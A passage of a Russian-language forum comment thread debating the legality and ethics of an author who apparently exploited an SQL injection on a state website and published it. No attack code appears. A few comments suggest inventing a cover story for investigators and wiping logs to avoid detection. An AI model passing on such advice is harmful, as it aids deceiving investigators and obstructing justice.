                                                Я считаю, что владельцам сайтов необходимо заслуживать привелегию получать данные о дырах первыми.
                                                Поддерживаю двумя руками. Если веб-сайты хотят получать информацию об уязвимостях — пусть, как минимум, разместят отдельный раздел на сайле для них, где гарантируют, что попытка им помочь не приведёт, хотя бы, к тому, что нужно будет тратить кучу денег на адвоката. Ну а если там условные 100 рублей обещают — тогда ещё лучше.

                                                Но по умолчанию — открытая публикация, желательно в ночь на воскресенье — и пусть развлекаются. Топикстартер итак им одолжение сделал, что в понедельник утром статью опубликовал…
                                                • 0
                                                  А кто мешает отправить информацию анонимно?
                                                  • +2

                                                    ФСБ, СОРМ и прочие? Не-не, я понимаю, можно сидя в южной америке в кафе без камер с бесплатным wifi с только что купленного ноутбука отправить им сообщение, вопрос был задан со словом "мешает". То есть не препятствует, но, эээ, немного мешает, в плане что когда будут искать крайнего, могут и найти даже если не подпишешься.

                                                    • +8
                                                      Но при этом на хабр опубликовать оказалось безопасно?
                                                    • +1
                                                      Анонимно уже не получится, боюсь. Возможно, по логам можно узнать, кто это так интересовался сайтом в три ночи, что напрудил аж 14 миллионов гет-запросов (или что-то в этом духе)
                                                    • +5
                                                      А чем это отличается от публикации на хабре? Кто мешает завести дело сейчас?
                                                      • 0
                                                        Шантажа то нет. Никто не угрожает что уязвимость будет опубликована.
                                                        • 0
                                                          Дело на что? HTTP GET запросы не запрещены. Размещение с дыркой (когда можно достать обычными запросами) разве не тождественна публичному размещению, т.е. виновности разместивших ПД с нарушениями, а не увидевших и прочитавших их?

                                                          Аналогия которую имею ввиду — валяющийся среди людной площади документ с грифом секретности.
                                                          • +1
                                                            Впрочем, понимаю что такая аналогия просто для яркости и простоты дела, и не стоит к ней цепляться сильно.

                                                            И конечно, всецело согласен с много раз вышесказанным, — что про эти уязвимости, да по госсайтам особенно, можно сообщать только хорошо продумав вопрос анонимности с позиции клинического параноика (адекватного человека 21 века).
                                                            • 0
                                                              Правильно думаете. А то будете потом эти аналогии следователю рассказывать. Которому плевать на SQL-инъекции.
                                                              • 0
                                                                и который SQL-инъекцию воспримет как героиновую и заведет еще и дело о распространении наркотиков.

                                                                «Ну вы же сами сказали — инъекция, сами во всем признались, что делали инъекции»
                                                              • 0
                                                                У вас ошибочные представления о том, как работает система правосудия. И я даже не говорю о российском правосудии.
                                                                Следуя вашей логике, взломщик, открывая дверь ломом, вовсе и не взламывает её, а только лишь пользуется тем, что она недостаточно прочно заперта. Ну а воров вообще всех без исключения следует немедленно отпустить из тюрем. Если, скажем, кто-то положил свой телефон в задний карман — по вашей логике он, считай, сам предложил вору этот телефон аккуратно вытащить.
                                                                По существующим в России законам автор статьи совершил противоправное деяние, причём умышленно.
                                                                Давайте продолжим аналогию с телефоном в заднем кармане. Вот кто-то видит телефон в заднем кармане, и сообщает: «Чувак, у тебя телефон могут легко спереть». Тут никакого преступления нет.
                                                                Если кто-то случайно (действительно случайно!) ввел в форму single quote и сообщил об увиденной ошибке администраторам — это не преступление. Впрочем, лучше этого не делать — могут заподозрить в посягательстве на преступление, или даже пришить ранее совершённое нераскрытое. Таковы уж особенности российской Фемиды.
                                                                Теперь если кто-то видит телефон в заднем кармане, аккуратно его вытаскивает, показывает владельцу и говорит: «Чувак, я у тебя вытащил телефон — но я не вор, а так только, проверял, получится или нет». Тут уже налицо противоправное деяние, и стоит лишь вопрос вины (умысел, дееспособность и тд). В теории бремя доказывания по уголовным — на обвинении, но в России «особая» презумпция. Та же ситуация, если кто-то целенаправленно мудохает форму, пытаясь извлечь данные из базы — тут тоже налицо противоправное деяние, и тоже стоит лишь вопрос умысла и тяжести.
                                                                • 0
                                                                  Я еще лучше аналогии придумал:
                                                                  — Идете по коридору, а там дверь у соседа открыта… и т.д.
                                                                  — Идете вы по парку, а там красивая девушка без трусов и без сознания лежит на скамейке в позе удобной…
                                                                  — А тут раз и машина стоит заведенная, а тебе так хочется узнать, а ездит ли она.
                                                                  • +3
                                                                    Подобные рассуждения в голову тоже приходили, конечно. Что с одной стороны можно описанный автором случай трактовать как кражу со взломом. Ну или кражу через вход в дверь, которую забыли закрыть.
                                                                    С другой стороны, это не прямой аналог кражи физических предметов, поскольку здесь всё что было «в квартире» там же и осталось, и даже ни одной бесполезной фарфоровой статуэтки не повреждено. Но у субъекта проникновения в доме появилось всё ровно то же, что было тут в квартире, с помощью чудесного волшебного 3D принтера-копировальщика. Какой тут ущерб?.. Отсканируй «супер3Dсканером» у меня телефон торчащий из кармана и «отсупер3Dраспечатай» себе такой же девайс — да сколько хочешь.

                                                                    Тут ближе именно что-то связанное с документами и тайной (коммерческой, гос, ПД и т.п.). Но бросать документы такие посреди прохожей площади (размещение в Интернет без аудита безопасности) — нельзя, это преступление того кто «бросил», а не кто подобрал. Это взгляд с другой стороны. Разве не логичен?
                                                                    К тому же ввод символа в поле формы ввода — что уж тогда не сажать немедленно тех, кто ввёл букву «а» в поле ввода? Причём даже ещё не нажавших кнопку отправки, — налицо же уже преступный умысел, в поле разработчиком ожидался другой ввод, а это уже явное покушение. Ведь бред же.
                                                                    Где грань?
                                                                    • 0
                                                                      Что является преступлением, а что нет, определяется не аналогиями, не материальным ущербом или общественной опасностью, а статьями УК. Аналогию я приводил лишь для того, чтобы показать, что такое противоправное деяние.
                                                                      В случае кражи — одна статья и одни действия, в случае папки с секретными документами — другая статья и другие действия, в случае неправомерного доступа к компьютерной информации — третья статья и совсем другие действия.
                                                                      Можно поспорить о том, разумны ли такие законы или нет — но факт нарушения это не отменяет.
                                                                      К тому же ввод символа в поле формы ввода — что уж тогда не сажать немедленно тех, кто ввёл букву «а» в поле ввода?

                                                                      Умысел требует доказательства. В случае однократного ввода буквы «a» это будет крайне затруднительно.
                                                                      • 0

                                                                        Как по-вашему должны квалифицироваться действия по публикации найденной на улице папки с грифом "Совсекретно", даже если пришлось тесёмочки развязывать, а может даже пломбу срывать? Естественно, при условии, что к гостайне ты допущен не был, подписок о неразглашении не давал и т. п. По совести и по действующему в РФ УК?

                                                                        • 0
                                                                          Вот, к примеру, Австралия, наши дни. Волнуюсь за чувака.
                                                                          • +1

                                                                            Надеюсь, что законодательство Австралии в этом плане аналогично нашему, а правоприменительная практика сильно отличается в лучшую для граждан сторону.

                                                                      • 0
                                                                        Где грань?

                                                                        Статья 17 УПК
                                                                        «Судья, присяжные заседатели, а также прокурор, следователь, дознаватель оценивают доказательства по своему внутреннему убеждению, основанному на совокупности имеющихся в уголовном деле доказательств, руководствуясь при этом законом и совестью.»
                                                                        Вот где-то там, во мраке внутреннего убеждения и совести эта грань пролегает. Не очень утешительно, но dura lex.
                                                                      • 0
                                                                        «Чувак, у тебя телефон могут легко спереть». Тут никакого преступления нет.
                                                                        Если кто-то случайно (действительно случайно!) ввел в форму single quote и сообщил об увиденной ошибке администраторам — это не преступление. Впрочем, лучше этого не делать — могут заподозрить в посягательстве на преступление, или даже пришить ранее совершённое нераскрытое. Таковы уж особенности российской Фемиды.
                                                                        Не вижу разницы между этими двумя ситуациями. «Впрочем» относится к обоим одинаково.
                                                                    • –1
                                                                      Вы еще напишите «TCP/IP не запрещен». В общем случае наличие уязвимостей не тождественно публичному размещению.

                                                                      Автор осуществил несанкционированный доступ к информации без согласия владельцев системы и пользователей, чьи данные там обрабатываются.
                                                                      • 0

                                                                        Ну, эксперт проводящий анализ кода сайта вполне может написать "Разработчиками сайта предоставлена возможность любому желающему выполнять произвольные SQL-запросы к базе данных путём прямого включения данных HTTP-запроса в SQL-запрос. Технически это означает, что вся база данных выложена в публичный доступ". Адвокат обвиняемого сообщит "Прошу суд обратить внимание, что в тексте пользовательского соглашения не было ограничений на виды отсылаемых HTTP-запросов, то есть мой клиент не знал и не должен был знать, что некоторые виды отсылаемых запросов противоправны. Исходя из того, что целевое назначение данного сайта раскрывать персональные данные выпускников вузов третьим лицам, мой клиент не знал и не мог знать, что федеральное предприятие раскрывает персональные данные выпускников без их согласия. Мы имеем все основания считать, что федеральные предприятия не нарушают законы РФ, в частности законодательство о защите персональных данных граждан и выкладывая персональные данные в публичный доступ озаботилось наличием согласия субъектов персональных данных или имеет законную причину не иметь этого согласия для обнародования."

                                                                        • +1
                                                                          Позвольте уточнить, если вы положили свой телефон на стол в публичном месте — вы его тоже отдали в «публичный доступ»?
                                                                          А если «эксперт по открыванию дверей» проникнет в вашу квартиру — можно тоже считать, что он «не знал и не мог знать» что доступ в квартиру ограничен?
                                                                          • +4
                                                                            Лежит на улице телефон, ты его поднял, ткнул ВКЛ, пароля нет, посмотрел контакты, нашёл контакт «мама» и позвонил "-здравствуйте, тут ваш телефон посеял...". Всё, п##ц? Должен налететь бобик гвардейцев кардинала, повесить три пули в голову, реанимировать, кинуть в любимых-граждано-возку и впаять 50 лет строгача? Ну как, контакты же чужие смотрел, использовал чужую вещь, и вообще ты хакер и общественно-опасный тип. Или что там?

                                                                            Доступ в незакрытую квартиру — вот ты сосед, увидал что незакрыто, номеров телефонов нет, фатально прям никуда не торопишься, понимаешь что открыта она на видном месте и наверняка его дурака (возвращаясь к гос.сайтику, но в случае если сначала предупреждать о баге приватно) обчистят — и решил зайти внутрь и дождаться хозяина из благих побуждений (соответственно чтоб не обчистили). И? Хрясь, наламывается два БТРа собров, дубинят всё что можно, 150 лет одиночки с конфискацией и работами на урановых рудниках.

                                                                            Вот что-то такое бредовое в наказаниях за сообщение уязвимостей я вижу.
                                                                            И похоже сильно не я один.

                                                                            И да, конечно, закон уже должен быть давно для таких случаев, чтоб сообщать можно было спокойно — всем же лучше.
                                                                            То что автор кинулся сразу багом на публику, — к сожалению, и не одобряю, хотя понимаю — мне видится от бесполезности иного способа действий для достижения цели «оперативное устранение уязвимости» относительно некоторых контор в настоящий момент.
                                                                            • 0
                                                                              Вы утрируете. Между тем мы обсуждаем реальную ситуацию.
                                                                              Даже за кражу телефона никто, конечно, стрелять не будет.
                                                                              Если вы зашли в квартиру соседа, у вас будет правдоподобное объяснение ваших действий. Прокурору придётся доказывать ваш умысел (кражу или что там вам будут вменять).
                                                                              В общем ничего бредового. Я говорю о реальной статье УК и реальном наказании, которое грозит ТС. Нужна такая статья или нет — разговор отдельный, вы смотрите с одной стороны, я смотрю с обоих. Главный аргумент «за» — если за противоправный доступ не наказывать, то реальные злодеи будут прикрываться white hack-ингом. Arguable, но не бред.
                                                                              • 0

                                                                                Прокурору в любом случае нужно доказывать умысел, прямой или косвенный. Только в редких случаях можно вынести уголовный приговор без доказательств умысла, только по объективной стороне дела.

                                                                                • 0
                                                                                  Я имел в виду, что в одних случаях ему это будет сделать проще, а в других сложнее.
                                                                          • 0

                                                                            В идеальном мире, с реально работающей судебной системой, такое вполне могло бы прокатить. Но мы живём в другом мире.

                                                                            • 0
                                                                              Мы живём в мире, где вполне возможно обеспечить себе максимально возможную анонимность, особенно в наших условиях (полной не бывает вообще нигде, по определению).

                                                                              Так, миль пардон – на… уя вы тут советуете людям подставляться под реальную статью и намеренно уходить от законных решений? Вместо того, чтобы просто максимально честно и максимально безопасно «слить» всё либо напрямую админам, либо их начальству (либо ещё выше)?

                                                                              Гапоны, помнится, были ещё век назад. Неужели до сих пор сохранились? Крайне не хотелось бы в это верить – при наличии реальных объяснений с вашей стороны, конечно же…
                                                                  • 0
                                                                    Гос и прочие структуры на сообщения об уязвимости на их информационных ресурсах не устраняют оные, но преследуют граждан по доброй воле сообщившие об этом.

                                                                    Была года два назад история в Словении: студент, уязвимость у гос. органов, 15 месяцев условно. Детали здесь.
                                                                  • +31
                                                                    Ссылка на Микротех уже не работает — публикация скрыта.
                                                                    Слабо представляю, как тут можно вырулить по-хорошему: неправомерный доступ к информ.системе уже произведён, перс.данные скопированы из «защищённого» контура — т.е. формальные признаки правонарушения налицо. Не в интересах автора лично обращаться к федералам, они не поймут благих намерений.
                                                                    • +5
                                                                      Автор на полном серьезе должен сообщить, что данную историю услышал в кафе от незнакомых лиц и сделал публикацию. Какие могут быть в таком случае претензии?
                                                                      • +1
                                                                        >данную историю услышал в кафе от незнакомых лиц
                                                                        В каком кафе? Какие лица?
                                                                        • +24
                                                                          Кафе «Берёзка», два лица славянской национальности, без особых примет
                                                                          • +9
                                                                            «В какое время происходила беседа?» -> Изъятие записей видеонаблюдения в кафе и с прилегающей территории -> Проверка наличия на записи как самого фигуранта, так и двух этих лиц… не обнаружены.

                                                                            «Что кушали в кафе, на какую сумму, у кого заказывали?» — опрос сотрудников кафе, изъятие чеков с фиск.накопителя кассы, сопоставление… не подтверждается.

                                                                            /Это я, как бы, за дознавателя сейчас играю…
                                                                            • +2
                                                                              В электричке два студента переговаривались. Сидел спиной и лиц не видел.
                                                                              • +16
                                                                                Тот самый эпичный вариант, когда пытясь отмазаться от одного подозрительного действия, человек нарушает закон уже явно — даёт заведомо ложные показания(307 УК РФ)…
                                                                                • +1
                                                                                  Так вроде как дача заведомо ложных показаний применима только к свидетелям (тому кто проходит по делу, как свидетель), но не к обвиняемому.
                                                                                  • +5
                                                                                    А он на данный момент ещё не обвиняемый… (:
                                                                                    Коллеги, давайте будем точны в терминах.
                                                                                    • +2
                                                                                      А он на данный момент ещё не обвиняемыйосужденный
                                                                                      Коллеги, давайте будем точны в терминах.
                                                                                      • +4
                                                                                        Следствие обвинение старается не предъявлять как можно дольше. Именно для того, чтобы будущий обвиняемый (обвиняемые) на момент начальных разбирательств имел(и) статус свидетеля(-ей).

                                                                                        У свидетелей прав меньше и степеней свободы, в процессе следствия.
                                                                                  • +1
                                                                                    Ну, понятно, что сечас автору уже просто ничего менять не стоит. И заходить на хабр я бы на месте автора уже поостерёгся. Это-лишь вариант, как исходная информация могла бы быть представлена, чтобы задача «найти первоисточник слива» стала почти нерешаемой.
                                                                                    • 0

                                                                                      306

                                                                                    • +7

                                                                                      Не надо пытаться играть на чужом поле, считая себя умным, а правоохранительную систему — идиотами. Ибо потом "суд с недоверием отнесся к показаниями обвиняемого", и привет.

                                                                                      • +20
                                                                                        Нет оснований не доверять сотрудникам полиции (с)
                                                                                        • +1
                                                                                          Надо играть на чужом поле, считая себя самым умным, а правоохранительную систему — идиотами (ибо идиоты они и есть). Ибо суд в любом случае отнесется к показаниям обвиняемого с недоверием. Единственный вопрос — лучше не прохладные истории выдумывать, а просто молчать, у нас в стране пока презумпция невиновности, а что-то самостоятельно доказать идиоты из правоохранительных систем в судах второй инстанции не способны.
                                                                                        • 0
                                                                                          и лог провайдера со входящего впн сервиса на 5 гб
                                                                                          • +1
                                                                                            Ну, строго говоря, дамп на 5 гигов может лежать на виртуалке, болтающейся условно-незнамо-где, а у автора на домашней машине — в лучшем случае следы от ssh-а на ту виртуалку.
                                                                                          • 0
                                                                                            Студенты чётко и внятно переговаривались SQL запросами :)
                                                                                        • 0
                                                                                          В нём давно WiFi нет )
                                                                                          • 0
                                                                                            А чё сразу славянской?
                                                                                        • +4
                                                                                          Автор на полном серьезе должен сообщить, что данную историю услышал в кафе от незнакомых лиц и сделал публикацию.

                                                                                          «Ствол не мой, случайно нашёл — иду сдавать, даже заявление вот уже написал.»
                                                                                          Не вижу разницы.
                                                                                          • 0
                                                                                            Только перед этим нужно почистить компьютер и удалить логи подключения у провайдера.
                                                                                            • 0
                                                                                              IP адресс с которого сделал скан — все еще на сайте. Так что поздно подтирать.
                                                                                              • 0
                                                                                                а толку? Если ТС делал со своего IP, то найти его можно простым grep'ом по логам nginx'а, если в GET параметрах, если POST и он логгируется, то чуть сложнее
                                                                                                • 0
                                                                                                  *если POST и он НЕ логгируется
                                                                                            • +1
                                                                                              Замените habrahabr в ссылке на sohabr и читайте на здоровье
                                                                                              • 0
                                                                                                Достаточно добавить «so» в начале url'а: «habrahabr.ru» -> «sohabrahabr.ru», «geektimes.ru» -> «sogeektimes.ru».
                                                                                              • +6
                                                                                                они не поймут благих намерений.

                                                                                                Я бы тоже не понял. И если само скачивание данных (при условии, что потом он их удалил) могу принять за дейятельность по исследованию уязвимости (с теоретически благими целями), то сама публикация данной статьи с инструкцией по взлому — действие однозначно преступное.

                                                                                                • 0
                                                                                                  + Если бы на моём сервисе нашли уязвимость, сообщили о ней и после фикса написали бы статью, я бы только спасибо сказал(ну и если б была возможность, отблагодарил бы материально). А не сообщить и написать статью, чтоб набежали скрпитс кидди и засрали базу — это уже какое-то вредительство.
                                                                                                  • +7
                                                                                                    как я писал сильно ниже, не надо путать себя и госструктуру, в которой всем на все пофигу, пока люлей не прописали.
                                                                                                    • +1
                                                                                                      И всё таки можно было сообщить а уже в случае игнора написать статью, но ТС даже не попытался
                                                                                                      • +1

                                                                                                        Да он же:


                                                                                                        1. Бессмертный
                                                                                                        2. Не верит в карму
                                                                                                        3. Владеет карточкой выходом из тюрьмы
                                                                                                  • +2
                                                                                                    Такой SQL injection банально показывают в ВУЗах, когда учат студентов, «как не надо делать».
                                                                                                    • +12
                                                                                                      Преступное действие это этот ресурс вообще с такой детской SQL injection. И по хорошему наказать надо начиная с руководителя этого всего дела и до самого низа — исполнителя.
                                                                                                      • 0

                                                                                                        Да, но это не оправдывает автора статьи.

                                                                                                      • +4
                                                                                                        А исполнителя за что?
                                                                                                        Исполнитель работает с известным качеством, с которым его нанимали (и зачастую даже лучше: чему-то научился). Наказывать надо CTO.
                                                                                                        • –1
                                                                                                          За то, что есть понятие врачебная ошибка, но нет понятия ошибка программиста. Хотя ущерб уже давно сопоставим в некоторых случаях.
                                                                                                          Если он не знает что такое SQL-инъекция и не способен написать безопасный код то его задачи должны ограничиваться интернет-магазинами и домашними страничками всяких продавцов шаурмы.
                                                                                                          • +1
                                                                                                            Что значит «сопоставим»? Вы меня как программиста, обижаете. Предыдущая система которую я писал имела цену ошибки намного выше чем обычные выплаты людям, родственники котоых погибли по чьей-то ошибке.